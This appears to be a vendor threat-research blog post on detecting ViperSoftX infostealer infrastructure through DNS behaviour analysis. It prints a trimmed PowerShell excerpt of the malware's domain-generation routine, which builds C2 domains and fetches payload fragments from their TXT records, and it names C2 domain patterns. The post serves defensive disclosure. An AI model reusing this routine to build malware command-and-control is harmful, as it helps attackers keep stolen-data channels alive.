AI-Driven DGA Detection Uncovers a Dormant Infostealer

By applying patented AI-Driven DGA Detection with Tuple Clustering, entire clusters of domains related to the ViperSoftX variants were identified by EfficientIP’s DNS Security years before they became active. This uncovered the systematic use of domain generation algorithms to sustain command-and-control operations, providing early visibility into one of today’s most persistent infostealer families. The findings confirm how DNS-centric Threat Intelligence delivers protection where traditional security tools fall short, ensuring organizations can stop cyber threats before they strike.

AI-Driven DGA Detection Reveals Infostealer Before It Struck

In our previous blogs, we detailed how EfficientIP’s DNS Threat Intelligence first detected the EIP-458 Infostealer, exposed its stealth tactics, and later confirmed its correlation to the notorious ViperSoftX malware family. Those findings showed how DNS Security solutions can reveal what traditional defenses miss. But the story goes further: by identifying the domain generation algorithms (DGAs) driving this campaign, EfficientIP researchers uncovered entire clusters of dormant domains long before they became active. This early visibility meant the infostealer could be detected and contained before launching its malicious activity at scale.

What Are DGAs?

A Domain Generation Algorithm (DGA) is a technique attackers use to automatically create large numbers of domain names. Malware relies on these domains to conduct its malicious activity: contact its command-and-control servers, send stolen data, or receive instructions. One of the key uses of DGAs is enabling data exfiltration, where stolen information is quietly transferred out through rotating domains. By frequently switching domains, attackers evade detection and keep their operations alive. From early cyber threats like Conficker to modern ones like Doki, DGAs show how threat actors evolve to bypass defenses. This is why AI-Driven DGA Detection is critical for stopping them before activation.

Most security tools try to spot DGAs by the domain name itself—its characters and structure (odd mixes, uncommon words, statistical “entropy”), sometimes with ML. Attackers now craft names that resemble normal domain names, so this method often misses threats and triggers false alarms.

EfficientIP’s AI-driven DNS security, powered by patented Tuple Clustering threat detection, focuses on behavior—not just domain names. It tracks who is querying which domains and when, bundling these signals into simple “tuples.” Clustering those tuples reveals groups that move together like a DGA family, even if some data is missing. The result is earlier detection of active and dormant DGAs with fewer false positives.

How the Infostealer Used DGAs to Build Resilient Domain Clusters

In researching the infostealer variants covered in our previous blogs, EfficientIP’s researchers found clear signs of domain generation algorithms within DNS Threat Intelligence. One of the most notable patterns was the creation of systematic domain clusters. Instead of relying on a single command-and-control server,  threat actors built families of domains following strict prefix, suffix, and TLD rules. Examples include names like slimawriter.com, slimardb.xyz, and slimashlow.com, all sharing the same structured pattern.A closer look revealed that all domains in the Slima cluster began with the prefix slima, followed by descriptors such as db, shlow, tfdsc, virtualb, or writer, and ended with either .com or .xyz. Among them, slimawriter.com stood out, as it was the only registered domain and operated as the active C2 server. Queries to this domain were significantly more frequent than to its peers, which remained dormant or unregistered but available as reserves to be activated if needed.

Extending the same AI-Driven DNS security analysis across DNS traffic uncovered additional clusters with different prefixes, including yeild, activato, freed, and quasar. 

Together, these naming rules — five prefixes, five suffixes, and two TLDs — formed a systematic framework capable of producing hundreds of domains. This structure gives  threat actors a scalable pool of interchangeable infrastructure, ensuring that when one domain is blocked or seized, others can immediately replace it.

This design illustrates how the campaign achieved resilience through redundancy. By rotating through structured clusters of domains, attackers ensured continuity and persistence, allowing them to operate undisturbed and conduct data exfiltration while making takedown efforts far more complex.

Domain Generation Algorithms Enabled Persistence

What enabled these structured clusters to exist at scale was the use of domain generation algorithms (DGAs). Instead of manually registering domains, the 2025 Zero-Day malware relied on a PowerShell routine that automatically produced hundreds of variations by combining prefixes, suffixes, and TLDs. This automation gave  threat actors a renewable infrastructure: when one domain was blocked, new ones could instantly take its place.

A trimmed excerpt of the routine is shown below (non-executable, with some lines intentionally removed for safety):

# Simplified DGA domain generation (trimmed for safety)
$domains  = @(“com”,”xyz”)
$prefixes = @(“activato”,”slima”,”yeild”,”quasa”,”freed”)
$suffixes = @(“rdb”,”writer”,”shlow”,”tfdsc”,”virtualb”)

foreach ($tld in $domains) {
  foreach ($pre in $prefixes) {
    foreach ($suf in $suffixes) {
      $fqdn = “$pre$suf.$tld”
      $res  = Query-DnsUpdates -targetDomain $fqdn   # fetch TXT records
      # Payload processing logic removed for safety
    }
  }
}

This algorithm generated domains such as slimawriter[.]com, freedrdb[.]xyz, or activatoshlow[.]com. The malware then queried their TXT records to retrieve encoded payload fragments. With this method, attackers could rotate in dormant or unregistered domains the moment active ones were blocked, ensuring continuity.

EfficientIP designated this DGA family as EIP-455-EconoMimics. Using its AI-driven Security based on innovative Tuple Clustering technology, the clusters were detected by EfficientIP’s DNS Security before they became operational. The algorithm worked by analyzing anomalies in DNS behavior and correlating them with graph theory and unsupervised machine learning.  Unlike syntax-only methods, AI-Driven DGA Detection exposed both active C2s and dormant domains. This gave defenders predictive visibility into attacker infrastructure. 

The DNS Threat Intelligence graph below shows client activity associated with EIP-455 from May to September 2025. Peaks in predictable DGA client counts reveal when the malware attempted to query generated domains, while sharp drops reflect blocks or inactivity. This timeline illustrates how AI-Driven DNS Security continuously tracks attacker behavior.

The EIP-455-EconoMimics family was then added to EfficientIP’s DNS Threat Intelligence feed, protecting our customers even while the 2025 Zero-Day malware was still dormant. This detection is clearly illustrated in EfficientIP’s DNS Intelligence Center (DNS IC) dashboard. The screenshot below shows systematic clusters such as slima, activato, freed, quasar, and yeild, all tagged under EIP-455 ID. Most domains still returned NXDOMAIN, highlighting how the DNS Security AI-Driven DGA Detection exposed dormant infrastructure long before it became operational — enabling proactive protection.

DGAs give the campaign long-term persistence and make takedown efforts far more difficult, since defenders cannot simply neutralize a handful of domains. By focusing on behavioral DNS signals, EfficientIP’s AI-Driven DGA Detection with Tuple Clustering revealed not only the active C2s but also dormant and unregistered domains. This enabled EfficientIP DNS Security Solution to identify attacker infrastructure early and protect customers by disrupting campaigns before they became operational.

AI-Driven DGA Detection Also Protected Against the ViperSoftX Variant

In our previous blog, we detailed how EfficientIP’s DNS Threat Intelligence exposed the link between the infostealer variants and the notorious ViperSoftX family. That AI-Driven security analysis confirmed attribution through cryptographic reuse and overlapping infrastructure. But the research also revealed that the ViperSoftX malware is using the PwrSh:CryptoStealer-C DGA. AI-Driven DGA Detection had identified the PwrSh:CryptoStealer-C malicious activity in our DNS Threat Intelligence as far back as June 2022.The first finding came from observing that domains seen in recent infostealer activity were consistent with historical ViperSoftX infrastructure. These domains followed systematic naming rules, combining predictable prefixes such as wmail, fairu, bideo, privatproxy, and ahoravideo with suffixes like endpoint, blog, chat, cdn, and schnellvpn, across both .com and .xyz. The screenshot below shows the threat matches in EfficientIP’s DNS Threat Intelligence dashboard between May and September 2025, where these recurring domain patterns were identified. 

Tracking back the malicious activity with AI-Driven DNS security revealed an even deeper history. Monitoring command-and-control (C&C) traffic showed that the DGA family has been active since June 2022. This demonstrated that EfficientIP’s AI-Driven DGA Detection had been flagging ViperSoftX-related infrastructure long before the most recent infostealer variants came to light.

Looking further back across the full four-year monitoring window revealed the true scale of the campaign. Thousands of related domains tied to ViperSoftX and its variants were generated during that period, many of which were detected and flagged by EfficientIP’s DNS Security before activation. This long-term visibility confirmed that the operators relied on systematic, large-scale domain generation to maintain persistence and ensure their infrastructure could survive takedowns.

Recent monitoring of dns traffic confirms that the PwrSh:CryptoStealer-C DGA family is far from inactive. Between May and September 2025, EfficientIP’s DNS Security solution identified a steady stream of domain-generation activity, clearly visible as a continuous line of threat detections. This demonstrates that ViperSoftX and its variants remain highly active over time.

Key Takeaways

From uncovering stealthy infostealer variants to detecting the long-term domain-generation activity behind ViperSoftX and its variants, this AI-Driven security research shows how attackers are building resilient infrastructures designed to evade takedowns. By leveraging patented AI-Driven DGA Detection with Tuple Clustering, EfficientIP’s 360° DNS Security solution identified these cyber threats years before they became fully active—revealing systematic domain clusters, tracking C&C activity, and confirming the evolution of one of today’s most dangerous infostealer families. This early threat detection ensures organizations remain protected against campaigns that traditional security tools fail to detect.